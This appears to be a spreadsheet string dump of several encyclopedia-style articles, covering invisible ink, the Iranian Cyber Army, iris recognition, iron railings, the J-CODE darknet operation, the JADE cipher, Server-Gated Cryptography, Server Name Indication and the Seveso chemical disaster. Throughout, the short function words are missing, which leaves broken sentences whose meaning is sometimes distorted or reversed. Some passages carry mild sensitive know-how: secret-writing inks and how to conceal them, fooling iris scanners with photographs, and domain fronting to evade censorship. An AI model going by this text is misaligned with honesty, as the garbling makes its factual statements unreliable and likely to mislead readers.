invisible reactive inks paints create variety effects used conjunction lights. voting system called scantegrity uses invisible enable voter obtain confirmation code voted selection. properties "ideal" invisible what "ideal" invisible depends intended use. example, property marking ideally done easily read ultraviolet light, whereas espionage would considered easily detectable since large number letters screened relatively quickly using light. invisible inks inherently "insecure" determined well-equipped inspector, must balanced logistical difficulty carrying mass-screening posted mail. easier perform large-scale undetected screening millions electronic communications, mass-screen even small fraction conventional mail. apart dictatorships large numbers personnel employed fellow nationals, screening posted mail feasible particular situations, letters particular suspect facility. british training manual used second world identified following properties "ideal" invisible ink: mixes water. non-volatile, i.e. pronounced smell. depositing crystals paper, i.e. easily seen glancing light. invisible ultraviolet light. does decompose discolor paper e.g. silver nitrate. nonreactive iodine, usual developers. potential developers possible. should develop heat. easily obtainable least plausible innocent holder. compound several chemicals, would violate 7.from practical experience usually incompatible. agents trained risk lives reliance insecure inks, world general, used invisible inks back-up method communication other, secure communication techniques unavailable. agency known supply special inks field agents, rather depend upon improvisation obtainable everyday chemicals. when agents forced improvise, advised dilute invisible much possible reduce chances detection. screening letters secret messages invisible made visible someone sufficiently determined, limitation generally time available fact cannot apply hours effort every single piece paper. thus successful invisible depends arousing suspicion invisible present. telltale signs invisible ink, scratches sharp pen, roughness, changed reflectivity paper (either dull shiny, usually using undiluted ink), obvious careful observer simply makes strong light, magnifying glass nose. also, words visible letter, "heat" code name, place context alert censor presence invisible ink. invisible effective glossy smooth paper types, since sizing papers prevents absorbed deep paper easily visible, especially paper examined glancing light. there are, however, commercially available inks non-porous surfaces visible ultraviolet light otherwise virtually invisible surfaces. using either ultraviolet light iodine fume cupboard, messages quickly screened invisible also read without first permanently developing invisible ink. thus, censor uses method intercept messages, letter sent intended recipient, unaware secret message already intercepted third party. "screening station" theoretically could involve visual olfactory inspection, examination ultraviolet light heating objects oven finally trying exposure iodine fumes produce optimal security optimal time. invisible types practical reasons, inks listed according method development. must understood however inks particularly organic origin consisting mixture several chemicals made visible several methods. example, invisible writing soap water made visible either heat, reaction phenolphthalein, viewing ultraviolet light, placing page inside iodine fume cupboard. inks developed heat some organic substances oxidize heated, usually turns brown. type "heat fixed" ink, acidic fluid work. secure following substances invisible dilution, usually water, close point become difficult develop. cola drink honey solution, sugar (sugar turns caramel dehydration) lemon, apple, orange onion juice (organic acids paper forms ester heat) milk (lactose dehydrates) bodily fluids blood serum. soap solution (carboxylic partially oxidizes) wine, vinegar cobalt chloride, turns blue heated becomes invisible overly heated)the writing rendered visible heating paper, either radiator, ironing using hair dryer, placing oven. 100-watt light bulb less likely damage paper. inks developed chemical reaction cases, substance changes color mixed acid base. phenolphthalein, commonly used indicator, turns pink presence base ammonia fumes sodium carbonate. vinegar, revealed cabbage water. vinegar contains acetic acid affects indicator cabbage water. vinegar also developed heat, above. ammonia, developed cabbage water. copper sulfate, developed sodium iodide, sodium carbonate, ammonium hydroxide potassium ferricyanide. lead(ii) nitrate, developed sodium iodide. iron(ii) sulfate, developed sodium carbonate potassium ferricyanate. cobalt(ii) chloride, developed potassium ferricyanide. iron(iii) sulfate, developed sodium sulfide. starch, developed iodine solution turns starch dark blue paper light blue. lemon juice, developed iodine solution (ink turns white, paper turns light blue). sodium chloride (common table salt), developed silver nitrate. cerium oxalate developed manganese sulfate hydrogen peroxide inks visible ultraviolet light some inks glow faintly (fluoresce) ultraviolet lamp. this property many substances, particularly organic substances body fluids. other inks work near opposite absorbing ultraviolet light without fluorescing. when used fluorescent paper, inked areas fluoresce less surrounding paper area ultraviolet lamp. this especially property inks yellow tint. some uv-visible inks detected photocopy, relatively strong ultraviolet component light photocopier scanning head. examples inks revealed ultraviolet light are: laundry detergents containing optical brighteners soap body fluids, serum, saliva sunscreen lemon juice inks alter surface paper this includes virtually invisible inks, pure distilled water also used way. application fluid alter paper surface fibers sizing. fumes created heating iodine crystals develop writing, appear brown iodine sticks preferentially altered areas paper. exposing paper strong sunlight return writing invisible state, using bleach solution. slightly dampening paper sponge steam drying writing message prevent writing developed method, overdoing dampening result telltale paper cockling. disappearing inks inks visible period time without intention made visible called disappearing inks. disappearing inks typically rely chemical reaction thymolphthalein basic substance sodium hydroxide. thymolphthalein, normally colorless, turns blue solution base. base reacts carbon dioxide (always present air), drops 10.5 color disappears. pens also available erased simply swiping special original text. disappearing inks used squirtguns, limited-time secret messages, security reasons non-reusable passes, fraudulent purposes, dress-making crafts measurement marks required disappear. modern usage indication security, invisible inks already known world however, 1999, u.s. central intelligence agency successfully requested world invisible remain exempt mandatory declassification, based premise invisible still relevant national security. world documents remained classified 2011.former mi-6 agent richard tomlinson stated pentel rolling writer rollerball pens extensively used mi-6 agents produce secret writing form invisible messages missions.in 2002, gang indicted spreading riot federal penitentiaries using coded telephone messages, messages invisible ink. references notes further reading kristie macrakis (2015). prisoners, lovers, spies: story invisible herodotus al-qaeda. yale university press. isbn 978-0300212600. john nagy (2009). invisible ink: spycraft american revolution. westholme publishing. isbn 978-1594161414. external links secret writing freedom information (foia) electronic reading room</t>
  </si>
  <si>
    <t>Iranian Cyber Army</t>
  </si>
  <si>
    <t>iranian cyber army iranian computer hacker group. thought connected iranian government, although officially recognized entity government. pledged loyalty supreme leader iran.according tehran bureau, islamic revolutionary guard initiated plans formation iranian cyber army 2005. organisation believed commanded mohammad hussein tajik assassination.the group claimed responsibility several attacks conducted internet since 2009, notably attacks baidu twitter. attack baidu resulted so-called sino-iranian hacker war. 2012, group self-identified "parastoo" (persian: پرستو swallow) hacked international atomic energy agency's servers: iranian cyber army suspected behind attack.in 2013, general islamic revolutionary guards stated iran "the biggest cyber power among world's cyber armies", claim supported israeli institute national security studies. also cyberwarfare iran references</t>
  </si>
  <si>
    <t>Iris recognition</t>
  </si>
  <si>
    <t>iris recognition automated method biometric identification uses mathematical pattern-recognition techniques video images irises individual's eyes, whose complex patterns unique, stable, seen distance. discriminating powers biometric technologies depend amount entropy able encode matching. iris recognition exceptional regard, enabling avoidance "collisions" (false matches) even cross-comparisons across massive populations. major limitation image acquisition distances greater meter two, without cooperation, difficult. retinal scanning different, ocular-based biometric technology uses unique patterns person's retina blood vessels often confused iris recognition. iris recognition uses video camera technology subtle near infrared illumination acquire images detail-rich, intricate structures iris visible externally. digital templates encoded patterns mathematical statistical algorithms allow identification individual someone pretending individual. databases enrolled templates searched matcher engines speeds measured millions templates second (single-core) cpu, remarkably false match rates. least billion persons around world (including billion citizens india, uidai aadhaar programme) enrolled iris recognition systems national e-government services, benefits distribution, security, convenience purposes passport-free automated border-crossings. advantage iris recognition, besides speed matching extreme resistance false matches, stability iris internal protected, externally visible organ eye. history although john daugman developed patented first actual algorithms perform iris recognition, published first papers gave first live demonstrations, concept behind invention much longer history today benefits many active scientific contributors. 1953 clinical textbook, f.h. adler wrote: fact, markings iris distinctive proposed photographs means identification, instead fingerprints." adler referred comments british ophthalmologist j.h. doggart, 1949 written that: "just every human different fingerprints, minute architecture iris exhibit variations every subject examined. [its features] represent series variable factors whose conceivable permutations combinations almost infinite." later 1980s, american ophthalmologists, flom aran safir managed patent adler's doggart's conjecture iris could serve human identifier, actual algorithm implementation perform patent remained conjecture. roots conjecture stretch back even further: 1892 frenchman bertillon documented nuances "tableau l'iris humain". divination sorts things based iris patterns goes back ancient egypt, chaldea babylonia, ancient greece, documented stone inscriptions, painted ceramic artefacts, writings hippocrates. (iris divination persists today, "iridology.") core theoretical idea daugman's algorithms failure test statistical independence strong basis pattern recognition, sufficiently high entropy (enough degrees-of-freedom random variation) among samples different classes. 1994 patented basis iris recognition underlying computer vision algorithms image processing, feature extraction, matching, published paper. these algorithms became widely licensed series companies: iriscan start-up founded flom, safir, daugman), iridian, sarnoff, sensar, lg-iris, panasonic, oki, bi2, irisguard, unisys, sagem, enschede, securimetrics l-1, owned french company morpho. with various improvements years, algorithms remain today basis significant public deployments iris recognition, consistently performers nist tests (implementations submitted l-1, morphotrust morpho, daugman serves chief scientist iris recognition). research many aspects technology alternative methods exploded, today rapidly growing academic literature optics, photonics, sensors, biology, genetics, ergonomics, interfaces, decision theory, coding, compression, protocol, security, mathematical hardware aspects technology. most flagship deployments algorithms airports, lieu passport presentation, security screening using watch-lists. early years century, major deployments began amsterdam's schiphol airport airport terminals allowing frequent travellers present iris instead passport, programme called iris: iris recognition immigration system. similar systems exist along canada border, many others. united arab emirates, air, land, seaports deploy algorithms screen persons entering requiring visa. because large watch-list compiled among states exhaustively searched time, number iris cross-comparisons climbed trillion years. government india enrolled iris codes well fingerprints) billion citizens uidai (unique identification authority india) programme national fraud prevention entitlements distribution. different type application, iris three biometric identification technologies internationally standardised since 2006 icao e-passports (the fingerprint face recognition). visible near infrared imaging iris melanin, also known chromophore, mainly consists distinct heterogeneous macromolecules, called eumelanin (brown–black) pheomelanin (yellow–reddish), whose absorbance longer wavelengths spectrum negligible. shorter wavelengths within spectrum, however, chromophores excited yield rich patterns. hosseini, provide comparison imaging modalities. alternative feature extraction method encode iris images also introduced, offer alternative approach multi-modal biometric systems. operating principle first system localize inner outer boundaries iris (pupil limbus) image eye. further subroutines detect exclude eyelids, eyelashes, specular reflections often occlude parts iris. pixels containing iris, normalized rubber-sheet model compensate pupil dilation constriction, analyzed extract pattern encoding information needed compare iris images. case daugman's algorithms, gabor wavelet transform used. result complex numbers carry local amplitude phase information iris pattern. daugman's algorithms, amplitude information discarded, 2048 bits representing iris pattern consist phase information (complex sign bits gabor wavelet projections). discarding amplitude information ensures template remains largely unaffected changes illumination camera gain, contributes long-term usability biometric template. identification (one-to-many template matching) verification (one-to-one template matching), template created imaging iris compared stored templates database. hamming distance decision threshold, positive identification effectively made statistical extreme improbability different persons could agree chance ("collide") many bits, given high entropy iris templates. advantages iris described ideal part human body biometric identification several reasons: internal organ well protected damage wear highly transparent sensitive membrane (the cornea). this distinguishes fingerprints, difficult recognize years certain types manual labor. iris mostly flat, geometric configuration controlled complementary muscles (the sphincter pupillae dilator pupillae) control diameter pupil. this makes iris shape predictable than, instance, face. iris fine texture that—like fingerprints—is determined randomly embryonic gestation. like fingerprint, hard impossible) prove iris unique. however, many factors formation textures (the iris fingerprint) chance false matches either extremely low. even genetically identical individuals (and left right eyes individual) completely independent iris textures. iris scan similar taking photograph performed meters away. there need person identified touch equipment recently touched stranger, thereby eliminating objection raised cultures fingerprint scanners, finger touch surface, retinal scanning, must brought close eyepiece (like looking microscope).the commercially deployed iris-recognition algorithm, john daugman's iriscode, unprecedented false match rate (better 10−11 hamming distance threshold 0.26 used, meaning bits iriscodes allowed disagree imaging noise, reflections, etc., still declaring match). while medical surgical procedures affect colour overall shape iris, fine texture remains remarkably stable many decades. some iris identifications succeeded period years. iris recognition works clear contact lenses, eyeglasses, non-mirrored sunglasses. early sensar technology worked first finding face, eyes, took iris images. this done using infrared lighting. possible identify someone uniquely dark room wearing sunglasses. mathematically, iris recognition based upon original daugman patents similar related patents define strongest biometric world. iris recognition uniquely identify anyone, easily discerns identical twins. human verify process iris images obtained customs station, entering even walking embassy, desktop factor authentication, etc.) live detection (which varies lighting trigger slight dilation pupil variations across quick scan take several image snapshots) integrity identification extremely high. shortcomings many commercial iris scanners easily fooled high quality image iris face place real thing. scanners often tough adjust become bothersome multiple people different heights succession. accuracy scanners affected changes lighting. iris scanners significantly expensive forms biometrics, well password proximity card security systems. iris recognition difficult perform distance larger meters person identified cooperating holding head still looking camera. however, several academic institutions biometric vendors developing products claim able identify subjects distances meters ("standoff iris" "iris distance" well princeton identity's "iris move" persons walking speeds meter/sec).as photographic biometric technologies, iris recognition susceptible poor image quality, associated failure enroll rates. identification infrastructure (national residents databases, cards, etc.), civil rights activists voiced concerns iris-recognition technology might help governments track individuals beyond will. researchers tricked iris scanners using images generated digital codes stored irises. criminals could exploit flaw steal identities others.the first study surgical patients involved modern cataract surgery showed change iris texture iris pattern recognition longer feasible probability falsely rejected subjects increased. security considerations biometric identification technology, important consideration live-tissue verification. reliability biometric identification depends ensuring signal acquired compared actually recorded live body part person identified manufactured template. besides person's physical characteristics, includes eyes, one's voice handwriting too, protected fourth amendment even though constantly exposed. many commercially available iris-recognition systems easily fooled presenting high-quality photograph face instead real face, makes devices unsuitable unsupervised applications, door access-control systems. however, case iris recognition algorithms. problem live-tissue verification less concern supervised applications (e.g., immigration control), human operator supervises process taking picture. methods suggested provide defence fake eyes irises include changing ambient lighting identification (switching bright lamp), pupillary reflex verified iris image recorded several different pupil diameters; analysing spatial frequency spectrum iris image peaks caused printer dither patterns found commercially available fake-iris contact lenses; analysing temporal frequency spectrum image peaks caused computer displays.other methods include using spectral analysis instead merely monochromatic cameras distinguish iris tissue material; observing characteristic natural movement eyeball (measuring nystagmus, tracking text read, etc.); testing retinal retroreflection (red-eye effect) reflections eye's four optical surfaces (front back cornea lens) verify presence, position shape. another proposed method imaging (e.g., stereo cameras) verify position shape iris relative features. 2004 report german federal office information security noted none iris-recognition systems commercially available time implemented live-tissue verification technology. like pattern-recognition technology, live-tissue verifiers false-reject probability therefore reduce overall probability legitimate user accepted sensor. deployed applications united arab emirates irisguard's homeland security border control operating expellee tracking system united arab emirates (uae) since 2003, launched national border-crossing security initiative. today, uae's land, ports entry equipped systems. foreign nationals need visit visa enter processed iris cameras installed primary auxiliary immigration inspection points. date, system apprehended 330,000 persons re-entering either another name nationality (which needs visa), even fraudulent travel documents. bank united texas. 1999 bank united became first bank world deploy iris recognition atms. these atms manufactured diebold using sensar iris recognition technology. pilots deployed bank united received national television coverage. coverage interviews sensar executives bank united executives included good morning america, today, many national television shows. hashemite kingdom jordan 2009, irisguard deployed world's first operational iris-enabled automated teller machine cairo amman bank, bank customers seamlessly withdraw cash atm's without bank card simply presenting iris recognition camera atm. since june 2012, irisguard also providing financial inclusion unhcr registered syrian refugees jordan atm's. system designed facilitate cash-supported interventions help deliver financial assistance refugees speed dignity lowering overhead costs boosting accountability. aadhaar began operation 2011 india, whose government enrolling iris patterns (and biometrics) billion residents aadhaar scheme entitlements distribution, unique identification authority india (uidai). this programme peak enrolling million persons every day, across 36,000 stations operated agencies. october 2015, number persons enrolled exceeded million, enrollee compared existing ones de-duplication checks (hence trillion, i.e. million-million, iris cross-comparisons day). purpose issue residents biometrically provable unique entitlement number (aadhaar) benefits claimed, social inclusion enhanced; thus slogan uidai give poor identity." iris technology providers must granted stqc (standardisation testing quality certification) certificate order supply iris scanners project. far, providers iritech inc. (dual iris scanner irimagic 100bk), cogent (cis-202), iris (icam 100), iris guard (ig-ad-100), etc. police forces across america planned start using technologies' mobile moris (mobile offender recognition information system) 2012. york city police department first, system installed manhattan fall 2010. iris recognition technology implemented bioid technologies pakistan unhcr repatriation project control distribution afghan refugees. refugees repatriated unhcr cooperation government pakistan, paid travel. make sure people paid once, irises scanned, system detect refugees next attempt. database million iris code templates around 4000 registrations day. one-to-many iris comparison takes place within seconds million iris codes. early 2013, united nation high commissioner refugees (unhcr) also installed biometrics identity management system (bims) iritech inc. refugees malawi camp. during pilot program, lasted four weeks, 17,000 people enrolled iris biometric data identities verified. after successful pilot malawi, thailand recently chosen first site global roll-out. after months, june 2015, unhcr completed registration nearly 110,000 myanmar refugees thailand’s border camps help system. amsterdam airport schiphol, netherlands, iris recognition permitted expedited, passport-free border security passing since 2001 privium program. canadian transport security authority's restricted area identity card (raic) program world's first dual-biometric program deployed around major canadian airports staff aircrews access restricted areas using separate channels passengers. number canadian airports, part nexus program facilitates entry canada pre-approved, low-risk travellers. several canadian airports, part canpass program facilitates entry canada pre-approved, low-risk travelers. uk's iris recognition immigration system, started operating 2004 closed registrations 2011 phased 2012 2013. used 2002 verify recognition "afghan girl" (sharbat gula) national geographic photographer steve mccurry. since least 2011, google uses iris scanners control access datacentres. 2010, leon, mexico, deployed iris scanners public spaces, identify fifty people once. 2011, hoyos group demonstrated device called eyelock using iris-recognition alternative passwords people password-protected sites applications, like facebook ebay. princeton identity developing "iris move" system products, primarily u.s. government clients, capable identifying people minute. most recently, specialized product drivers identified without needing leave vehicle. m2sys technology deployed rightpatient™ biometric patient identification system using iris recognition novant health hospitals charlotte winston-salem markets. rightpatient™ iris biometric patient identification system designed capture face iris pattern patients uniquely link electronic medical record. march 2015, india’s andhra pradesh state launched iris-based identity management solution developed iritech enhancing pension distribution system. chief minister chandrababu naidu demonstrated irishield mk2120u device launching event andhra pradesh state's iris scanning facility pension distribution. "the state's decision iris technology primary method issue aadhaar verified (direct benefit transfer) address concerns total inclusiveness residence well providing accurate hygiene solution," says binod mathai, director biometronic technology. 2015, fujitsu released arrows f-04g first smartphone iris scanner. 2015, kenya ministry education, science technology order provide accurate attendance tracking students classes (roll-call) school buses (getting on/off tracking) implemented iris biometric system. solution includes iritech’s irishield camera connecting cost android phone tablet cable. iris matching done on-board irishield whose internal gallery hold identities (expandable 5,000 identities) enough schools. local matching capability particular advantage school-bus scenario require wireless/3g communication biometric terminal back-end server. 2015, microsoft launched lumia phones (lumia lumia featuring iris scanning authenticate user. 2017, first iris-enabled humanitarian blockchain system world deployed azraq refugee camp jordan irisguard. more 10,000 syrian refugees eyes without token food building blocks private ethereum blockchain aws) redeem assistance. project expanded 100,000 refugees january 2018. march 2018, world food program (wfp) started implement iris recognition food distribution system first time uganda. country hosting approximately million refugees asylum-seekers. countries highest number refugees world. iritech's iris scanner 2121u used deliver right food right refugees, making sure food assistance entitled plans scale system food distribution sites across uganda year. sept 2019, zaincash started deploy iris recognition perform cash distribution refugees idps first time using irisguard eyepay mobile phone kurdistan, iraq using zaincash mobile wallet. world first mobile iris deployment carried united nations high commissioner refugees (unhcr) irisguard zain iraq. iris recognition television movies origins (2014), hollywood film writer-director mike cahill winner alfred sloan award best exposition technology (2014 sundance film festival), uses iris recognition core plot. culminating india uidai project encode enroll iris patterns billion indian residents 2015, film described "science fiction love story incorporating spiritualism reincarnation", seeking reconcile science religious spirit-world beliefs. steven spielberg's 2002 science fiction film minority report depicts society appears form iris recognition become daily practice. principal character undergoes transplant order change identity continues original eyes gain access restricted locations. island (2005), clone character played ewan mcgregor uses gain access security door home donor. simpsons movie (2007) features scene illustrates difficulty image acquisition iris recognition. series numb3rs, features scene robber gets calsci facility cracking code assigned specific iris. ncis uses iris scanner garage, forensic vehicle investigations carried evidence stored. there another scanner entrance mtac. sequence leroy jethro gibbs verified shown title sequence. imagery sequence "enhanced" using special effects. iris recognition systems laser like beams shown sequence light near-infrared nearly invisible. 2010 film includes scene bruce willis' character uses contact lens pass iris scan gain access headquarters. film "angels demons" also book featured iris scanner method protagonist broke cern stole antimatter storage modules. film "demolition man" also scene eyeball stick used break weapons storage facility. also biometric technology access control iris recognition immigration system vein verification finger vein recognition fingerprint recognition iris challenge evaluation samsung galaxy references further reading external links iso/iec 19794-6:2011 international standard iris images john daugman's original patent uspto</t>
  </si>
  <si>
    <t>Iron railing</t>
  </si>
  <si>
    <t>iron railing fence made iron. this either wrought iron, ductile durable hammered elaborate shapes hot, cheaper cast iron, ductility quite brittle. cast iron also produce complicated shapes, created moulds compressed sand rather hammering, would likely damage iron. history earliest uses cast iron railings england 1710–14 paul's cathedral, despite objections christopher wren, want fence around cathedral all, said wrought rather cast iron. made gloucester furnace, lamberhurst, weald kent surrounded cathedral, including seven gates. weighed hundred tons cost pence pound. total cost £11,202 fortune then. railings known cast weald. other early uses cast iron railings cambridge senate house martin-in-the-fields, london.wrought iron used construct ornate railings. davies brothers wrexham made railings 18th century much admired nikolaus pevsner described work "miraculous". they made fine wrought iron railings stansty park seen erddig hall.during world many sets iron railings britain removed. railings usually base; stubs still seen outside many buildings london elsewhere never replaced. this supposedly provide scrap metal munitions, scepticism whether actually used purpose.in 2012 artist catalina pollak created interactive sound installation called phantom railings malet street gardens, london, site railings removed world acoustic sensors pick movement pedestrians walking translate "the familiar sound produced running stick along iron fence". cheshire county cheshire, hedging road junctions corners replaced black-and-white railings distinctive curved top. they characteristic area restored become dilapidated. united states stewart iron works covington, kentucky largest wrought iron fence manufacturer world. factory supplied decorative fences panama canal, british embassy washington, d.c., taft museum, well entrance gates white house, rutherford hayes presidential center, u.s. house representatives others. gallery also ironwork references</t>
  </si>
  <si>
    <t>J-CODE</t>
  </si>
  <si>
    <t>j-code, acronym joint criminal opioid darknet enforcement, operation announced u.s. attorney general jeff sessions january 2018, pittsburgh, pennsylvania targets illegal opioid distribution darknet. given integrity robustness hidden services anonymity network, however, sting operations, seizure servers, tracking postal deliveries, general exploitation failures operational security expected standard operating procedure. references</t>
  </si>
  <si>
    <t>JADE (cipher machine)</t>
  </si>
  <si>
    <t>jade codename given codebreakers japanese world cipher machine. imperial japanese navy used machine communications late 1942 1944. jade similar another cipher machine, coral, main difference jade used encipher messages katakana using alphabet symbols.according nsa, "apparently, jade machine stand heavy usage field, and, initial high volume traffic, used much less." while coral traffic also low, important user japanese representative, vice admiral abe, axis war-planning council whose reports coded coral intercepted proved vital allied planning european theater. also purple external links tentative list enigma other machine usages march 1945 jade covered references references japanese wikipedia separate mathematical sciences cryptography, science inc., 1982, “deciphering japanese machine cryptography united states theoretical considerations”, masataka kato machine cryptography modern cryptanalysis, cipher deavours, louis kruh, artech house, 1985 machines, stephen kelley, aegean park press, 2001 "naval operational communication history", guard corps school art, showa "shin takayama tore 128," miyauchi kanto, rokuko publishing, 1975 history kitajima island naval forces, "cryptographic printing machine thin-bar type replacement board", kakuji ishigami, 1985 review correspondence warfare correspondence warfare measures", yoshio nakano, 1955</t>
  </si>
  <si>
    <t>Server-Gated Cryptography</t>
  </si>
  <si>
    <t>server-gated cryptography (sgc), also known international step-up netscape, defunct mechanism used step 40-bit 56-bit 128-bit cipher suites ssl. created response united states federal legislation export strong cryptography 1990s. legislation limited encryption weak algorithms shorter lengths software exported outside united states america. when legislation added exception financial transactions, created extension certificates restricted financial organisations. 1999, list expanded include online merchants, healthcare organizations, insurance companies. this legislation changed january 2000, resulting vendors longer shipping export-grade browsers certificates becoming available without restriction. internet explorer supported starting patched versions internet explorer became obsolete internet explorer 5.01 internet explorer started supporting strong encryption without need separate high encryption pack (except windows 2000, needs high encryption pack included service pack later). "export-grade" browsers unusable modern many servers disabling export cipher suites. additionally, browsers incapable using sha-2 family signature hash algorithms like sha-256. certification authorities trying phase issuance certificates older sha-1 signature hash algorithm. continuing facilitates obsolete, insecure browsers https. however, certificates sha-1 signature hash algorithm remain available, certificate authorities continue issue certificates (often charging premium them) although obsolete. reason certificate authorities charge premium certificates browsers allowed limited number roots support sgc. when handshake takes place, software (e.g. browser) would list ciphers supports. although weaker exported browsers would include weaker ciphers initial handshake, browser also contained stronger cryptography algorithms. there protocols involved activate them. netscape communicator used international step-up, used obsolete insecure renegotiation change stronger cipher suite. microsoft used sgc, sends client hello message listing stronger cipher suites connection certificate determined capable, also supported netscape step-up compatibility (though support 5.01 version changing algorithms step-up work properly). also freak references external links microsoft's page server gated cryptography mod_ssl documentation sgc, step-up global-id</t>
  </si>
  <si>
    <t>Server Name Indication</t>
  </si>
  <si>
    <t>server name indication (sni) extension transport layer security (tls) computer networking protocol client indicates hostname attempting connect start handshaking process. this allows server present multiple possible certificates address port number hence allows multiple secure (https) websites service tls) served address without requiring sites certificate. conceptual equivalent http/1.1 name-based virtual hosting, https. this also allows proxy forward client traffic right server tls/ssl handshake. desired hostname encrypted original extension, eavesdropper site requested. background problem prior sni, making connection, client specify site trying connect hence, physical server hosts multiple sites, server know certificate protocol. detail, making connection, client requests digital certificate server. once server sends certificate, client examines compares name trying connect name(s) included certificate. match occurs, connection proceeds normal. match found, user warned discrepancy connection abort mismatch indicate attempted man-in-the-middle attack. however, applications allow user bypass warning proceed connection, user taking responsibility trusting certificate and, extension, connection. however, hard even impossible lack full list names advance obtain single certificate covers names server responsible for. server responsible multiple hostnames likely need present different certificate name small group names). possible subjectaltname contain multiple domains controlled person single certificate. such "unified communications certificates" must reissued every time list domains changes. name-based virtual hosting allows multiple hostnames hosted single server (usually server) address. achieve this, server uses hostname presented client part protocol (for http name presented host header). however, using https, handshake happens server sees http headers. therefore, possible server information http host header decide certificate present names covered certificate could served address. practice, meant https server could serve domain small group domains) address secured efficient browsing. assigning separate address site increases cost hosting, since requests addresses must justified regional internet registry ipv4 addresses exhausted. ipv6, increases administrative overhead multiple single machine, even though address space exhausted. result many websites effectively constrained using secure communications. technical principles addresses issue client send name virtual domain part negotiation's clienthello message. this enables server select correct virtual domain early present browser certificate containing correct name. therefore, clients servers implement sni, server single address serve group domain names impractical common certificate. added ietf's internet rfcs june 2003 3546, transport layer security (tls) extensions. latest version standard 6066. security implications server name indication payload encrypted, thus hostname server client tries connect visible passive eavesdropper. this protocol weakness exploited security software network filtering monitoring governments implement censorship. presently, multiple technologies attempting hide server name indication. domain fronting domain fronting technique replacing desired host name another hosted server frequently, network servers known content delivery network. when client uses domain fronting, replaces server domain (unencrypted), leaves http host header (which encrypted tls) server serve right content. domain fronting violates standard defining itself, compatibility limited (many services check host matches http header host reject connections domain-fronted invalid). while domain fronting used past avoid government censorship, popularity dwindled major cloud providers (google, amazon's cloudfront) explicitly prohibit technical restrictions encrypted client hello encrypted client hello (ech) protocol extension enables encryption whole client hello message, sent early stage negotiation. encrypts payload public relying party browser) needs know advance, means effective large cdns known browser vendors advance. initial 2018 version extension called encrypted (esni) implementations rolled "experimental" fashion address risk domain eavesdropping. firefox removed support esni. contrast ech, encrypted encrypted rather whole client hello. opt-in support version incorporated firefox october 2018 required enabling dns-over-https.in march 2020, esni reworked extension, analysis demonstrated encrypting insufficient. example, specifications permit pre-shared extension contain data facilitate session resumption, even transmission cleartext copy exactly server name encrypted esni. also, encrypting extensions one-by-one would require encrypted variant every extension, potential privacy implications, even exposes extensions advertised. lastly, real-world deployment esni exposed interoperability limitations. short name echo march 2020 changed 2020.both esni compatible rely keyshareentry first defined 1.3. also, ech, client must propose versions 1.3.in august 2020, great firewall china started blocking esni traffic, still allowing traffic.in october 2020, russian rostelecom mobile operator tele2 started blocking esni traffic. september year, russian censorship ministry roscomnadzor planned range encryption protocols, among esni, hindered site access censorship. implementation 2004, patch adding tls/sni openssl created edelkey project. 2006, patch ported development branch openssl, 2007 back-ported openssl 0.9.8 (first released 0.9.8f). application program implement sni, library uses must implement application must pass hostname library. further complicating matters, library either included application program component underlying operating system. because this, browsers implement running operating system, others implement running certain operating systems. support references external links 6066 (obsoletes 4366, obsoleted 3546)</t>
  </si>
  <si>
    <t>Seveso disaster</t>
  </si>
  <si>
    <t>seveso disaster industrial accident occurred around 12:37 july 1976, small chemical manufacturing plant approximately kilometres north milan lombardy region italy. resulted highest known exposure 2,3,7,8-tetrachlorodibenzo-p-dioxin (tcdd) residential populations, gave rise numerous scientific studies standardized industrial safety regulations, including european union's seveso directive. this accident ranked eighth list worst man-made environmental disasters time magazine 2010. location disaster seveso disaster named seveso, community affected, population 17,000 1976. other affected neighbouring communities meda (19,000), desio (33,000), cesano maderno (34,000) lesser extent barlassina (6,000) bovisio-masciago (11,000). industrial plant, located meda, owned company industrie chimiche meda società azionaria (meda chemical industries s.a., icmesa), subsidiary givaudan, turn subsidiary hoffmann-la roche (roche group). factory building built many years earlier local population perceive potential source danger. moreover, although several exposures populations dioxins occurred before, mostly industrial accidents, limited scale. chemical events accident occurred chemical plant's building chemical 2,4,5-trichlorophenol produced 1,2,4,5-tetrachlorobenzene nucleophilic aromatic substitution reaction sodium hydroxide. 2,4,5-trichlorophenol intended intermediate hexachlorophene.this reaction must carried temperature achievable using normal process utilities available plant, decided exhaust steam onsite electricity generation turbine, pass around external heating coil installed chemical reactor vessel. exhaust steam pressure normally temperature resulted reaction mixture temperature close boiling point safety testing showed onset exothermic side reaction reaction mixture temperature reached crucially, steam temperature reading made available plant operators responsible reactor. chemical-release accident occurred batch process interrupted prior completion final step removal ethylene glycol reaction mixture distillation, conformance italian requiring shutdown plant operations weekend. other parts site already started close processing batches finished, reduced power consumption across plant, causing dramatic drop load turbine consequent increase temperature exhaust steam around this much hotter steam proceeded heat portion metal wall accident reactor level liquid within temperature. steam temperature reading among instruments, operators reactor unaware presence additional heating, stopped batch normally would isolating steam turning stirrer reactor vessel. abnormally-hot upper region reactor jacket heated adjacent reaction mixture. with stirrer running, heating highly localised confined portion upper layers reaction mixture adjacent reactor wall, increased local temperature critical temperature exothermic side reaction seen testing. indeed, critical temperature proved lower believed. lower critical temperature, slow runaway decomposition began, releasing heat leading onset rapid runaway reaction temperature reached seven hours later.the reactor relief valve eventually opened, causing aerial release tonnes chemicals, settled (6.9 surrounding area. among substances released tcdd (3). nominal reaction temperature, tcdd normally seen trace amounts less (parts million). however, higher-temperature conditions associated runaway reaction, tcdd production apparently reached more. immediate effects affected area split zones decreasing order surface soil concentrations tcdd. zone split sub-zones. local population advised touch locally grown fruits vegetables. zone tcdd soil concentration micrograms square metre (μg/m2); residents. zone tcdd soil concentration μg/m2; 4700 residents. zone negligible concentration tcdd μg/m2; 31,800 residents.within days total 3,300 animals, mostly poultry rabbits, found dead. emergency slaughtering commenced prevent tcdd entering food chain, 1978 80,000 animals slaughtered. children quickly hospitalised skin inflammation. august, zone completely evacuated fenced. 1,600 local people ages medically examined, found suffer skin lesions chloracne. advice center pregnant women, opted abortion (which legal special cases) consultation. another women continued pregnancies without problems, children showing sign malformation. herwig zwehl (technical director icmesa) paolo paoletti (director production icmesa) arrested. government commissions established develop plan quarantining decontaminating area, italian government allotted billion lire (us$47.8 million). this amount tripled years later. studies immediate long-term health effects 1991 study, fourteen years accident, sought assess effects thousands persons exposed dioxin. evident adverse health effect ascertained chloracne (193 cases). other early effects noted peripheral neuropathy liver enzyme induction. ascertainment other, possibly severe sequelae dioxin exposure (e.g., birth defects) hampered inadequate information; however, generally, increased risks evident. study published 1998 concluded chloracne (nearly cases definite exposure dependence) effect established certainty. early health investigations including liver function, immune function, neurologic impairment, reproductive effects yielded inconclusive results. excess mortality rate cardiovascular respiratory 